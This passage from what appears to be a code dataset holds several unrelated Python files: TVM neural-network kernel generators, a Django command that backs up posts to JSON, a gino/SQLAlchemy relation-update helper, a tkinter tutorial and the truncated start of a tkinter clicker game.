\"Activation_ndim%d_%s_%s\" % (ndim, dtype, optype)\n print(opname)\n\n # define compute\n in_tensor = tvm.placeholder(shape, dtype=dtype, name='in_tensor')\n out_tensor = TopiActivation(in_tensor, optype, memcpy=True)\n tensor_list = [in_tensor, out_tensor]\n s = tvm.create_schedule(out_tensor.op)\n Genlib(s, tensor_list, device, opname, lib_path)\n\n\ndef BatchNorm(device=\"llvm\", lib_path=\"./\",\n ndim=None, dtype=None, optype=False, axis=None):\n '''\n batchnorm\n Args:\n device:\n lib_path:\n ndim:\n dtype:\n optype:\n axis:\n\n Returns:\n '''\n if axis >= ndim:\n return\n shape = [tvm.var(\"n\" + str(i)) for i in range(ndim)]\n channel = shape[axis]\n eps = tvm.var(\"epsilon\", dtype=\"float32\")\n opname = optype + (\"_ndim%d_%s_axis%d\" % (ndim, dtype, axis))\n print(opname)\n\n # define compute\n in_tensor = tvm.placeholder(shape, dtype=dtype, name='in_tensor')\n mean = tvm.placeholder((channel,), dtype=dtype, name='mean')\n variance = tvm.placeholder((channel,), dtype=dtype, name='var')\n scale = tvm.placeholder((channel,), dtype=dtype, name='scale')\n offset = tvm.placeholder((channel,), dtype=dtype, name='offset')\n\n variance_sqrt = tvm.compute((channel,), lambda i: tvm.sqrt(variance[i] + eps.astype(dtype)))\n if optype == \"TFBatchNorm\":\n out_tensor = tvm.compute(shape, lambda *idx: ((in_tensor[idx] - mean[idx[axis]]) / variance_sqrt[idx[axis]]) *\\\n scale[idx[axis]] + offset[idx[axis]])\n tensor_list = [eps, in_tensor, scale, offset, mean, variance, out_tensor]\n elif optype == \"CaffeBatchNorm\":\n out_tensor = tvm.compute(shape, lambda *idx: (in_tensor[idx] - mean[idx[axis]]) / variance_sqrt[idx[axis]])\n tensor_list = [eps, in_tensor, mean, variance, out_tensor]\n elif optype == \"CaffeScale\":\n out_tensor = tvm.compute(shape, lambda *idx: in_tensor[idx] * scale[idx[axis]] + offset[idx[axis]])\n tensor_list = [in_tensor, scale, offset, out_tensor]\n elif optype == \"TFBiasAdd\":\n out_tensor = tvm.compute(shape, lambda *idx: in_tensor[idx] + offset[idx[axis]])\n tensor_list = [in_tensor, offset, out_tensor]\n else:\n raise RuntimeError(\"no support for {}\".format(optype))\n\n # define schedule & generate lib\n s = tvm.create_schedule(out_tensor.op)\n Genlib(s, tensor_list, device, opname, lib_path)\n\n\ndef Pooling(device=\"llvm\", lib_path=\"./\",\n ndim=None, dtype=None, pooling_mode=None, kernel=None, stride=None, pad=None, caffe_mode=None,\n use_global=False):\n '''\n pooling\n Args:\n device:\n lib_path:\n ndim:\n dtype:\n pooling_mode:\n kernel:\n stride:\n pad:\n caffe_mode:\n use_global:\n\n Returns:\n '''\n shape = [tvm.var(\"n\" + str(i)) for i in range(0, ndim)]\n layout = 'NCHW'\n if use_global:\n opname = \"GlobalPooling_ndim%d_%s_%s\" % (ndim, dtype, pooling_mode)\n else:\n kernel_h, kernel_w = kernel\n stride_h, stride_w = stride\n pad_up, pad_down, pad_left, pad_right = pad\n if pad_up == 0 and pad_down == 0 and pad_left == 0 and pad_right == 0 and caffe_mode:\n caffe_mode = False\n opname = \"Pooling_ndim%d_%s_%s_kernel%d%d_stride%d%d_pad%d%d%d%d%s\" \\\n % (ndim, dtype, pooling_mode, kernel_h, kernel_w, stride_h, stride_w,\n pad_up, pad_down, pad_left, pad_right, \"_caffe\" if caffe_mode else \"\")\n print(opname)\n\n # define compute\n in_tensor = tvm.placeholder(shape, dtype=dtype, name='in_tensor')\n if use_global:\n out_tensor = topi.nn.global_pool(in_tensor, pool_type=pooling_mode, layout=layout)\n sch = topi.generic.schedule_adaptive_pool(out_tensor)\n else:\n out_tensor = topi.nn.pool(in_tensor,\n kernel=(kernel_h, kernel_w),\n stride=(stride_h, stride_w),\n padding=(pad_up, pad_left, pad_down, pad_right),\n pool_type=pooling_mode,\n ceil_mode=False,\n layout=layout,\n count_include_pad=False)\n sch = topi.generic.schedule_pool(out_tensor, layout)\n tensor_list = [in_tensor, out_tensor]\n Genlib(sch, tensor_list, device, opname, lib_path, print_lower=False)\n\n\ndef Eltwise(device=\"llvm\", lib_path=\"./\",\n ndim_a=None, ndim_b=None, dtype=None, mode=None):\n '''\n eltwise\n Args:\n device:\n lib_path:\n ndim_a:\n ndim_b:\n dtype:\n mode:\n\n Returns:\n '''\n ndim_max = max(ndim_a, ndim_b)\n shape = [tvm.var(\"n\" + str(i)) for i in range(ndim_max)]\n shape_b1 = [dim if i == 1 else 1 for i, dim in enumerate(shape)]\n shape_a = shape[ndim_max - ndim_a:] if ndim_a else (1,)\n shape_b = shape[ndim_max - ndim_b:] if ndim_b == ndim_a else shape_b1 if ndim_b == 1 else (1,)\n opname = \"Eltwise_%s_ndimA%d_ndimB%d_%s\" % (mode, ndim_a, ndim_b, dtype)\n print(opname)\n\n # define compute\n in_tensor = tvm.placeholder(shape_a, dtype=dtype, name='in_tensor')\n b_tensor = tvm.placeholder(shape_b, dtype=dtype, name='b_tensor')\n\n topi_funs = {\n 'add': topi.add,\n 'subtract': topi.subtract,\n 'multiply': topi.multiply,\n 'divide': topi.divide,\n 'maximum': topi.maximum,\n 'minimum': topi.minimum,\n }\n\n out_tensor = topi_funs[mode](in_tensor, b_tensor)\n tensor_list = [in_tensor, b_tensor, out_tensor]\n s = topi.generic.schedule_elemwise(out_tensor)\n Genlib(s, tensor_list, device, opname, lib_path)\n\n\ndef Softmax(device=\"llvm\", lib_path=\"./\",\n ndim=None, dtype=None, axis=None):\n '''\n softmax\n Args:\n device:\n lib_path:\n ndim:\n dtype:\n axis:\n\n Returns:\n '''\n if axis >= ndim:\n return\n shape = [tvm.var(\"n\" + str(i)) for i in range(ndim)]\n opname = \"Softmax_ndim%d_%s_axis%s\" % (ndim, dtype, axis)\n print(opname)\n\n # define compute\n in_tensor = tvm.placeholder(shape, dtype=dtype, name='in_tensor')\n out_tensor = topi.nn.softmax(in_tensor, axis)\n tensor_list = [in_tensor, out_tensor]\n s = topi.generic.schedule_elemwise(out_tensor)\n Genlib(s, tensor_list, device, opname, lib_path)\n\n\ndef Resize(device=\"llvm\", lib_path=\"./\",\n ndim=None, dtype=None, method=None, align_corners=None):\n '''\n resize\n Args:\n device:\n lib_path:\n ndim:\n dtype:\n method:\n align_corners:\n\n Returns:\n '''\n shape = [tvm.var(\"n\" + str(i)) for i in range(ndim)]\n new_height = tvm.var(\"newHeight\")\n new_width = tvm.var(\"new_width\")\n opname = \"Resize_ndim%d_%s_%s_%s\" % (ndim, dtype, method, \"Align\" if align_corners else \"NotAlign\")\n print(opname)\n\n # define compute\n in_tensor = tvm.placeholder(shape, dtype=dtype, name='in_tensor')\n out_tensor = resize(in_tensor, [new_height, new_width], align_corners=align_corners, method=method)\n tensor_list = [new_height, new_width, in_tensor, out_tensor]\n s = topi.generic.schedule_injective(out_tensor)\n Genlib(s, tensor_list, device, opname, lib_path)\n\n\ndef Mean(device=\"llvm\", lib_path=\"./\",\n ndim=None, dtype=None, axis=None, keep_dims=None):\n '''\n mean\n Args:\n device:\n lib_path:\n ndim:\n dtype:\n axis:\n keepDims:\n\n Returns:\n '''\n if axis[-1] >= ndim:\n return\n shape = [tvm.var(\"n\" + str(i)) for i in range(ndim)]\n axis_str = \"\"\n for dim in axis:\n axis_str += str(dim)\n opname = \"Mean_ndim%d_%s_axis%s_%s\" % (ndim, dtype, axis_str, \"keepDims\" if keep_dims else \"notkeepDims\")\n print(opname)\n\n # define compute\n in_tensor = tvm.placeholder(shape, dtype=dtype, name='in_tensor')\n c_shape = shape[:]\n reduced_num = 1\n for dim in axis:\n c_shape[dim] = 1\n reduced_num *= shape[dim]\n\n def _ComputeSum(*b_idx):\n reduce_axis = [tvm.reduce_axis((0, shape[dim])) for dim in axis]\n a_idx = list(b_idx)\n for i, dim in enumerate(axis):\n a_idx[dim] = reduce_axis[i]\n a_idx = tuple(a_idx)\n return tvm.sum(in_tensor[a_idx], axis=reduce_axis)\n\n out_tensor = tvm.compute(c_shape, _ComputeSum)\n out_tensor = tvm.compute(c_shape, lambda *i: out_tensor(*i) / reduced_num)\n if not keep_dims:\n out_tensor = topi.squeeze(out_tensor, axis)\n\n # define schedule & generate lib\n tensor_list = [in_tensor, out_tensor]\n s = tvm.create_schedule(out_tensor.op)\n Genlib(s, tensor_list, device, opname, lib_path)\n\n\ndef CaffeCrop(device=\"llvm\", lib_path=\"./\",\n ndim=None, dtype=None, axis=None):\n '''\n caffe crop op\n Args:\n device:\n lib_path:\n ndim:\n dtype:\n axis:\n\n Returns:\n '''\n shape = [tvm.var(\"n\" + str(i)) for i in range(axis)]\n shape_a = shape[:]\n shape_b = shape[:]\n offsets = []\n for i in range(axis, ndim):\n shape_a.append(tvm.var(\"nA\" + str(i)))\n shape_b.append(tvm.var(\"nB\" + str(i)))\n offsets.append(tvm.var(\"offset\" + str(i)))\n opname = \"CaffeCrop_ndim%d_%s_axis%d\" % (ndim, dtype, axis)\n print(opname)\n\n # define compute\n in_tensor = tvm.placeholder(shape_a, dtype=dtype, name='in_tensor')\n b_tensor = tvm.placeholder(shape_b, dtype=dtype, name='b_tensor')\n begin = [0] * axis + offsets\n end = shape_a[:]\n for i in range(axis, len(shape_a)):\n end[i] = offsets[i - axis] + shape_b[i]\n shape_c = [end[i] - begin[i] for i in range(ndim)]\n\n def _Compute(*C_idx):\n a_idx = [idx + begin[i] for i, idx in enumerate(list(C_idx))]\n a_idx = tuple(a_idx)\n return in_tensor[a_idx]\n\n out_tensor = tvm.compute(shape_c, _Compute)\n tensor_list = offsets + [in_tensor, b_tensor, out_tensor]\n\n s = tvm.create_schedule(out_tensor.op)\n Genlib(s, tensor_list, device, opname, lib_path)\n\n\ndef FullConnection(device=\"llvm\", lib_path=\"./\",\n ndim_a=None, dtype=None, has_bias=None):\n '''\n full connection\n Args:\n device:\n lib_path:\n ndim_a:\n dtype:\n hasBias:\n\n Returns:\n '''\n n_dim, ci, h_dim, kernel_tensor = (tvm.var(\"n_dim\"), tvm.var(\"out_tensor\"), tvm.var(\"h_dim\"), \\\n tvm.var(\"kernel_tensor\"))\n co = tvm.var(\"co\")\n if ndim_a == 4:\n shape_a = (n_dim, ci, h_dim, kernel_tensor)\n chw = ci * h_dim * kernel_tensor\n else:\n shape_a = (n_dim, ci)\n chw = ci\n shape_w = (co, chw)\n opname = \"FullConnection_ndimA%d_%s_%s\" % (ndim_a, dtype, \"hasBias\" if has_bias else \"notHasBias\")\n is_var = True\n vh, vw, vc = 1, 1, 1\n print(opname)\n\n in_tensor = tvm.placeholder(shape_a, dtype=dtype, name='in_tensor')\n kernel_tensor = tvm.placeholder(shape_w, dtype=dtype, name='kernel_tensor')\n input_tensor = topi.reshape(in_tensor, (n_dim, chw)) if len(shape_a) == 4 else in_tensor\n\n out_tensor = _matmul_spatial_pack_asm((is_var, 0, ci, vh, vw, vc), input_tensor, kernel_tensor, \\\n layout='NC', out_dtype=dtype)\n if has_bias:\n bias = tvm.placeholder((co,), dtype=dtype, name='bias')\n out_tensor = tvm.compute((n_dim, co), lambda n, co: out_tensor[n, co] + bias[co], tag='injective')\n\n tensor_list = [in_tensor, kernel_tensor, bias, out_tensor] if has_bias else [in_tensor, kernel_tensor, out_tensor]\n cfg = {'is_var': is_var, 'is_transpose': 0, 'core_id': 0, 'CI': ci, 'VH': vh, 'VW': vw, 'VC': vc}\n s = _matmul_schedule_asm(cfg, [out_tensor])\n Genlib(s, tensor_list, device, opname, lib_path)\n\n\ndef Power(device=\"llvm\", lib_path=\"./\",\n ndim=None, dtype=None):\n '''\n power\n Args:\n device:\n lib_path:\n ndim:\n dtype:\n\n Returns:\n '''\n shape = [tvm.var(\"n\" + str(i)) for i in range(ndim)]\n power = tvm.var(\"power\", dtype=\"float32\")\n scale = tvm.var(\"scale\", dtype=\"float32\")\n shift = tvm.var(\"shift\", dtype=\"float32\")\n opname = \"Power_ndim%d_%s\" % (ndim, dtype)\n print(opname)\n\n in_tensor = tvm.placeholder(shape, dtype=dtype, name='in_tensor')\n out_tensor = tvm.compute(shape, lambda *i: tvm.power(in_tensor[i] * scale.astype(in_tensor.dtype) + \\\n shift.astype(in_tensor.dtype), \\\n power.astype(in_tensor.dtype)))\n tensor_list = [power, scale, shift, in_tensor, out_tensor]\n\n s = tvm.create_schedule(out_tensor.op)\n Genlib(s, tensor_list, device, opname, lib_path)\n\n\ndef CaffePReLU(device=\"llvm\", lib_path=\"./\",\n ndim=None, dtype=None, channel_shared=None):\n '''\n caffe prelu\n Args:\n device:\n lib_path:\n ndim:\n dtype:\n channel_shared:\n\n Returns:\n '''\n shape = [tvm.var(\"n\" + str(i)) for i in range(ndim)]\n channel = 1 if channel_shared else shape[1]\n opname = \"CaffePReLU_ndim%d_%s_%s\" % (ndim, dtype,\n \"channelShared\" if channel_shared else \"channelNotShared\")\n print(opname)\n\n in_tensor = tvm.placeholder(shape, dtype=dtype, name='in_tensor')\n slope = tvm.placeholder((channel,), dtype=dtype, name='slope')\n if channel_shared:\n out_tensor = tvm.compute(shape, lambda *idx: tvm.if_then_else(in_tensor[idx] >= 0, in_tensor[idx],\\\n in_tensor[idx] * slope[0]))\n else:\n out_tensor = tvm.compute(shape, lambda *idx: tvm.if_then_else(in_tensor[idx] >= 0, in_tensor[idx],\\\n in_tensor[idx] * slope[idx[1]]))\n\n tensor_list = [in_tensor, slope, out_tensor]\n s = tvm.create_schedule(out_tensor.op)\n Genlib(s, tensor_list, device, opname, lib_path)\n\n\ndef Pad(device=\"llvm\", lib_path=\"./\",\n ndim=None, dtype=None, paddingmode=None):\n '''\n pad\n Args:\n device:\n lib_path:\n ndim:\n dtype:\n paddingmode:\n\n Returns:\n '''\n shape = [tvm.var(\"n\" + str(i)) for i in range(ndim)]\n pad_before = [tvm.var(\"pad_before\" + str(i)) for i in range(ndim)]\n pad_after = [tvm.var(\"pad_after\" + str(i)) for i in range(ndim)]\n pad_before_const = [0, 0] + pad_before[2:]\n pad_after_const = [0, 0] + pad_after[2:]\n paddings = [None] * 2 * len(shape)\n paddings[0:: 2] = pad_before\n paddings[1:: 2] = pad_after\n pad_value = 0\n opname = \"Pad_ndim%d_%s_%s\" % (ndim, dtype, paddingmode)\n print(opname)\n\n # define compute\n in_tensor = tvm.placeholder(shape, dtype=dtype, name='in_tensor')\n if paddingmode == \"CONSTANT\":\n out_tensor = topi.nn.pad(in_tensor, pad_before_const, pad_after_const, pad_value=pad_value, name='out_tensor')\n else:\n out_tensor = mirror_pad(in_tensor, pad_before_const, pad_after_const, mode=paddingmode, name='out_tensor')\n tensor_list = paddings + [in_tensor, out_tensor]\n def SchedulePad(inputs):\n s = tvm.create_schedule(inputs.op)\n if s[inputs].op.axis:\n s[inputs].parallel(s[inputs].op.axis[1])\n return s\n\n s = SchedulePad(out_tensor)\n Genlib(s, tensor_list, device, opname, lib_path)\n\n\ndef MatMul(device=\"llvm\", lib_path=\"./\",\n ndim_a=None, ndim_b=None, dtype=None, transpose_a=None, transpose_b=None):\n '''\n matmul\n Args:\n device:\n lib_path:\n ndim_a:\n ndim_b:\n dtype:\n transpose_a:\n transpose_b:\n\n Returns:\n '''\n m, k, n_dim = tvm.var(\"m\"), tvm.var(\"k\"), tvm.var(\"n_dim\")\n a_shape = (m, k) if not transpose_a else (k, m)\n b_shape = (k, n_dim) if not transpose_b else (n_dim, k)\n opname = \"MatMul_ndimA%d_ndimB%d_%s_%d_%d\" % (ndim_a, ndim_b, dtype, transpose_a, transpose_b)\n print(opname)\n\n # define compute\n in_tensor = tvm.placeholder(a_shape, dtype=dtype, name='in_tensor')\n b_tensor = tvm.placeholder(b_shape, dtype=dtype, name='b_tensor')\n out_tensor = topi.matmul(in_tensor, b_tensor, transpose_a, transpose_b)\n tensor_list = [in_tensor, b_tensor, out_tensor]\n s = topi.generic.schedule_elemwise(out_tensor)\n Genlib(s, tensor_list, device, opname, lib_path)\n\n\ndef Stack(device=\"llvm\", lib_path=\"./\",\n ndim=None, dtype=None, input_num=None, axis=None):\n '''\n stack\n Args:\n device:\n lib_path:\n ndim:\n dtype:\n input_num:\n axis:\n\n Returns:\n '''\n if axis > ndim:\n return\n shape = [tvm.var(\"n\" + str(i)) for i in range(ndim)]\n shapes = [shape] * input_num\n in_tensor = [tvm.placeholder(shape, dtype=dtype, name='in_tensor%d' % i) for i, shape in enumerate(shapes)]\n opname = \"Stack_ndim%d_%s_input_num%d_axis%d\" % (ndim, dtype, input_num, axis)\n print(opname)\n\n input_tensor = [topi.expand_dims(ai, axis) for ai in in_tensor]\n out_tensor = topi.concatenate(tuple(input_tensor), axis=axis)\n tensor_list = in_tensor + [out_tensor]\n if ndim < 4:\n s = topi.generic.schedule_concatenate(out_tensor)\n else:\n s = tvm.create_schedule(out_tensor.op)\n Genlib(s, tensor_list, device, opname, lib_path)\n\n\ndef ArgMax(device=\"llvm\", lib_path=\"./\",\n ndim=None, dtype=None, axis=None, keep_dims=None, top_k=None,\n out_dtype=None):\n '''\n argmax\n Args:\n device:\n lib_path:\n ndim:\n dtype:\n axis:\n keepDims:\n top_k:\n out_dtype:\n\n Returns:\n '''\n if axis >= ndim:\n return\n shape = [tvm.var(\"n\" + str(i)) for i in range(ndim)]\n opname = \"ArgMax_ndim%d_%s_axis%d_%s_top%d_%s\" \\\n % (ndim, dtype, axis, \"keepDims\" if keep_dims else \"notKeepDims\", top_k, out_dtype)\n print(opname)\n\n in_tensor = tvm.placeholder(shape, dtype=dtype, name='in_tensor')\n out_tensor = topi.argmax(in_tensor, axis=axis, keepdims=keep_dims)\n out_tensor = AsType(out_tensor, out_dtype)\n tensor_list = [in_tensor, out_tensor]\n s = tvm.create_schedule(out_tensor.op)\n Genlib(s, tensor_list, device, opname, lib_path)\n\n\ndef Exp(device=\"llvm\", lib_path=\"./\",\n ndim=None, dtype=None):\n '''\n exp\n Args:\n device:\n lib_path:\n ndim:\n dtype:\n\n Returns:\n '''\n shape = [tvm.var(\"n\" + str(i)) for i in range(ndim)]\n opname = \"Exp_ndim%d_%s\" % (ndim, dtype)\n print(opname)\n\n # define compute\n in_tensor = tvm.placeholder(shape, dtype=dtype, name='in_tensor')\n if 'int' in dtype:\n input_tensor = AsType(in_tensor, 'float32')\n out_tensor = topi.exp(input_tensor)\n out_tensor = AsType(out_tensor, in_tensor.dtype)\n else:\n out_tensor = topi.exp(in_tensor)\n tensor_list = [in_tensor, out_tensor]\n s = topi.generic.schedule_injective(out_tensor)\n Genlib(s, tensor_list, device, opname, lib_path)\n\n\ndef Cast(device=\"llvm\", lib_path=\"./\",\n ndim=None, src_dtype=None, dst_dtype=None):\n '''\n cast\n Args:\n device:\n lib_path:\n ndim:\n src_dtype:\n dst_dtype:\n\n Returns:\n '''\n shape = [tvm.var(\"n\" + str(i)) for i in range(ndim)]\n opname = \"Cast_ndim%d_%s_%s\" % (ndim, src_dtype, dst_dtype)\n print(opname)\n\n # define compute\n in_tensor = tvm.placeholder(shape, dtype=src_dtype, name='in_tensor')\n out_tensor = topi.cast(in_tensor, dst_dtype)\n tensor_list = [in_tensor, out_tensor]\n s = topi.generic.schedule_injective(out_tensor)\n Genlib(s, tensor_list, device, opname, lib_path)\n\n\ndef ExpandDims(device=\"llvm\", lib_path=\"./\",\n ndim=None, axis=None, dtype=None):\n '''\n expand dims\n Args:\n device:\n lib_path:\n ndim:\n axis:\n dtype:\n\n Returns:\n '''\n if axis > ndim:\n return\n shape = [tvm.var(\"n\" + str(i)) for i in range(ndim)]\n opname = \"ExpandDim_ndim%d_%s_axis%d\" % (ndim, dtype, axis)\n print(opname)\n\n # define compute\n in_tensor = tvm.placeholder(shape, dtype=dtype, name='in_tensor')\n out_tensor = topi.expand_dims(in_tensor, axis=axis)\n tensor_list = [in_tensor, out_tensor]\n s = topi.generic.schedule_injective(out_tensor)\n Genlib(s, tensor_list, device, opname, lib_path)\n\n\ndef Tile(device=\"llvm\", lib_path=\"./\",\n ndim=None, dtype=None):\n '''\n tile\n Args:\n device:\n lib_path:\n ndim:\n dtype:\n\n Returns:\n '''\n shape = [tvm.var(\"n\" + str(i)) for i in range(ndim)]\n multiples = [tvm.var(\"k\" + str(i)) for i in range(ndim)]\n opname = \"Tile_ndim%d_%s\" % (ndim, dtype)\n print(opname)\n\n def _Compute(*C_idx):\n a_idx = [tvm.floordiv(idx, multiples[i]) for i, idx in enumerate(list(C_idx))]\n a_idx = tuple(a_idx)\n return in_tensor[a_idx]\n\n # define compute\n in_tensor = tvm.placeholder(shape, dtype=dtype, name='in_tensor') # tvm 0.6-dev: topi.tile\n shape_c = (np.array(shape) * np.array(multiples)).tolist()\n out_tensor = tvm.compute(shape_c, _Compute)\n\n tensor_list = multiples + [in_tensor, out_tensor]\n s = topi.generic.schedule_injective(out_tensor)\n Genlib(s, tensor_list, device, opname, lib_path)\n\n\ndef Range(device=\"llvm\", lib_path=\"./\",\n out_dtype=None):\n '''\n range\n Args:\n device:\n lib_path:\n out_dtype:\n\n Returns:\n '''\n start = tvm.var(\"start\")\n delta = tvm.var(\"delta\")\n opname = \"Range_ndim_\" + out_dtype\n print(opname)\n\n out_tensor = tvm.compute((tvm.var(\"n0\"),), lambda i: start.astype(out_dtype) + delta.astype(out_dtype) * i, \\\n name='out_tensor')\n out_tensor = AsType(out_tensor, out_dtype)\n tensor_list = [start, delta, out_tensor]\n s = topi.generic.schedule_injective(out_tensor)\n Genlib(s, tensor_list, device, opname, lib_path)\n\n\ndef Split(device=\"llvm\", lib_path=\"./\",\n ndim=None, dtype=None, output_num=None, axis=None):\n '''\n split\n Args:\n device:\n lib_path:\n ndim:\n dtype:\n output_num:\n axis:\n\n Returns:\n '''\n if axis >= ndim:\n return\n size_splits = [tvm.var(\"split\" + str(i)) for i in range(output_num)]\n a_shape = [tvm.var(\"n\" + str(i)) for i in range(axis)] \\\n + [np.sum(size_splits)] \\\n + [tvm.var(\"n\" + str(i)) for i in range(axis + 1, ndim)]\n c_shapes = []\n for i in range(output_num):\n c_shape = []\n for j in range(ndim):\n if j == axis:\n c_shape.append(tvm.var(\"split\" + str(i)))\n else:\n c_shape.append(tvm.var(\"n\" + str(j)))\n c_shapes.append(c_shape)\n indices_or_sections = np.cumsum(size_splits).tolist()[:-1]\n opname = \"Split_ndim%d_%s_output_num%d_axis%d\" % (ndim, dtype, output_num, axis)\n print(opname)\n\n # define compute\n in_tensor = tvm.placeholder(a_shape, dtype=dtype, name='in_tensor')\n\n def _Compute(*C_idx):\n a_idx = list(C_idx)\n a_idx[axis] += idx_shift\n a_idx = tuple(a_idx)\n return in_tensor[a_idx]\n\n indices_or_sections_add0 = [0] + indices_or_sections\n out_tensor = []\n for i in range(output_num):\n idx_shift = indices_or_sections_add0[i]\n ci = tvm.compute(c_shapes[i], _Compute)\n out_tensor.append(ci)\n tensor_list = size_splits + [in_tensor] + out_tensor\n\n s = topi.generic.schedule_injective(out_tensor)\n Genlib(s, tensor_list, device, opname, lib_path)\n","sub_path":"predict/module/tvm_kernel/lite/python/at_ops/at_lib.py","file_name":"at_lib.py","file_ext":"py","file_size_in_byte":40572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"493658336","text":"import json\nfrom builtins import FileExistsError\nfrom pathlib import Path\n\nfrom django.conf import settings\n\nfrom core.management.base import LoginCommand\nfrom reading.models import Post\nfrom reading.utils import export_post\n\n\nclass Command(LoginCommand):\n help = \"Backs up a user's posts in respective json files.\"\n\n def add_arguments(self, parser):\n parser.add_argument('--output_path', nargs=1, type=str)\n\n def handle(self, *args, **options):\n user = self.login_user()\n\n if options['output_path']:\n base_dir = Path(options['output_path'][0])\n else:\n base_dir = Path('{0}/docs/lectura_json/posts'.format(settings.BASE_DIR))\n\n base_dir.mkdir(parents=True, exist_ok=True)\n posts = Post.objects.filter(creator=user).select_related('project', 'creator')\n\n for post in posts:\n project_dir = base_dir / post.project.slug\n try:\n project_dir.mkdir(parents=True, exist_ok=False)\n except FileExistsError:\n pass\n post_filename = project_dir / '{0}.json'.format(post.slug)\n post_dict = export_post(post)\n\n with post_filename.open('w+') as f:\n f.write(json.dumps(post_dict, indent=2))\n self.stdout.write(self.style.SUCCESS(post_filename))\n","sub_path":"lectura/reading/management/commands/backup_posts.py","file_name":"backup_posts.py","file_ext":"py","file_size_in_byte":1334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"311504845","text":"from sqlalchemy.sql.expression import and_\n\nfrom ..crud_relations import CrudModelRelation, CrudModelRelationType\n\n\nclass UpdateItemRelations:\n @staticmethod\n async def update_item_relations(data, item, relations):\n for relation in relations.update_item_relations:\n if relation.relation_type == CrudModelRelationType.MANY_TO_MANY:\n await UpdateItemRelations._update_item_many_to_many_relations(\n item_id=item.id,\n data=data,\n data_key=relation.field,\n through_model=relation.through_model,\n relation_key=relation.relation_key,\n base_key=relation.base_key,\n )\n if relation.relation_type == CrudModelRelationType.CHILDREN:\n await UpdateItemRelations._update_item_children_relations(\n item_id=item.id, data=data, relation=relation\n )\n if relation.relation_type == CrudModelRelationType.PARENT:\n await UpdateItemRelations._update_item_parent_relations(\n item, data, relation\n )\n\n @staticmethod\n async def _update_item_parent_relations(\n item, data, relation: CrudModelRelation\n ):\n prev_id = getattr(item, relation.relation_key)\n next_id = getattr(data, relation.field).dict().get(\"id\")\n if prev_id != next_id:\n update_info = {relation.relation_key: next_id}\n await item.update(**update_info).apply()\n\n @staticmethod\n async def _update_item_children_relations(\n item_id, data, relation: CrudModelRelation\n ):\n next_ids = set(\n [\n item.get(\"id\")\n for item in data.dict().get(relation.field)\n if item.get(\"id\")\n ]\n )\n prev_ids = set(\n [\n item.id\n for item in await relation.relation_model.query.where(\n getattr(relation.relation_model, relation.base_key)\n == item_id\n ).gino.all()\n ]\n )\n to_remove = prev_ids - next_ids\n to_add = next_ids - prev_ids\n\n clear_values = {relation.base_key: None}\n insert_values = {relation.base_key: item_id}\n await relation.relation_model.update.values(**clear_values).where(\n getattr(relation.relation_model, \"id\").in_(to_remove),\n ).gino.status()\n\n await relation.relation_model.update.values(**insert_values).where(\n getattr(relation.relation_model, \"id\").in_(to_add),\n ).gino.status()\n\n @staticmethod\n async def _update_item_many_to_many_relations(\n item_id,\n data,\n data_key,\n through_model,\n relation_key,\n base_key,\n ):\n through_items = await through_model.query.where(\n getattr(through_model, base_key) == item_id\n ).gino.all()\n prev_ids = set([getattr(item, relation_key) for item in through_items])\n\n next_ids = set(\n [getattr(item, \"id\") for item in getattr(data, data_key)]\n )\n\n to_remove = prev_ids - next_ids\n to_add = next_ids - prev_ids\n\n # remove items\n await through_model.delete.where(\n and_(\n getattr(through_model, base_key) == item_id,\n getattr(through_model, relation_key).in_(to_remove),\n )\n ).gino.status()\n\n # add items\n insert_values = [\n {base_key: item_id, relation_key: through_id}\n for through_id in to_add\n ]\n\n await through_model.insert().gino.all(insert_values)\n","sub_path":"backend/app/core/crud/view/update_relations.py","file_name":"update_relations.py","file_ext":"py","file_size_in_byte":3707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"389680033","text":"# References\n# https://docs.python.org/3/library/tkinter.html#the-packer\n# https://tcl.tk/man/tcl8.6/TkCmd/pack.htm\n\nimport tkinter\n# from tkinter import * <-- this is so you don't have to type tkinter.class() when initializing an object\n\n# button clicked\ndef button_clicked():\n print(\"I got clicked\")\n new_text = user_input.get()\n # my_label.config(text=\"Button Got Clicked\")\n my_label.config(text=new_text)\n\nwindow = tkinter.Tk() # Tk class to initialize an object\nwindow.title(\"My First GUI Program\") # shows at top bar of program\nwindow.minsize(width=500, height=300) # scales to be a specified size\nwindow.config(padx=20, pady=20)\n\n# Label\nmy_label = tkinter.Label(text=\"I am a Label\", font=(\"Arial\", 24, \"bold\")) # access Label class\n# my_label.pack(side=\"top\") # place it on screen and center\n#\n# my_label[\"text\"] = \"New Text\"\nmy_label.config(text=\"New Text\")\n# my_label.place(x=100, y=200)\nmy_label.grid(column=0, row=0)\nmy_label.config(padx=50, pady=50)\n\n\n# Button\nbutton = tkinter.Button(text=\"Click Me\", command=button_clicked)\n# button.pack()\nbutton.grid(column=1, row=1)\n\nnew_button = tkinter.Button(text=\"New Button\")\nbutton.grid(column=2, row=0)\n\n# Entry\nuser_input = tkinter.Entry(width=10)\n# user_input.pack()\nprint(user_input.get())\nuser_input.grid(column=3, row=2)\n\n\n\n\nwindow.mainloop() # keeps window on screen, built into the package\n\n\n# # ---- MANY POSITIONAL ARGUMENTS ----\n# # * will allow you to use as many arguments for that parameter\n# def add(*args):\n# for n in args:\n# print(n)\n#\n# # E.g. add(3, 5, 7, 8)\n# # args is a tuple\n","sub_path":"intermediate_programs/day27-GUI-FunctionArgs-Tkinter/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"10871737","text":"#!/usr/bin/python3\nfrom tkinter import *\nfrom threading import *\nfrom multiprocessing import *\nimport locale\nimport time\nimport shelve\nimport atexit\n# TODO\n# - Change independent item mainloop threads into one single mainloop counter threads\n# \\- Create system for inserting item into mainloop\n\n# open save file as object save and load money\nsave = shelve.open('savefile.db')\nmoney = save['money']\n\nif not save['scaler']:\n startuproot = Tk()\n startuproot.title('Set the difficulty.')\n startuproot.geometry('200x50')\n scalerentry = Entry(startuproot)\n scalerentry.insert(0, 32)\n\n def get_entry_output():\n global PRICE_SCALER\n PRICE_SCALER = int(scalerentry.get())\n startuproot.destroy()\n confirm = Button(startuproot, text=\"Done\", command=get_entry_output)\n scalerentry.pack()\n confirm.pack()\n startuproot.mainloop()\n\nelse:\n PRICE_SCALER = 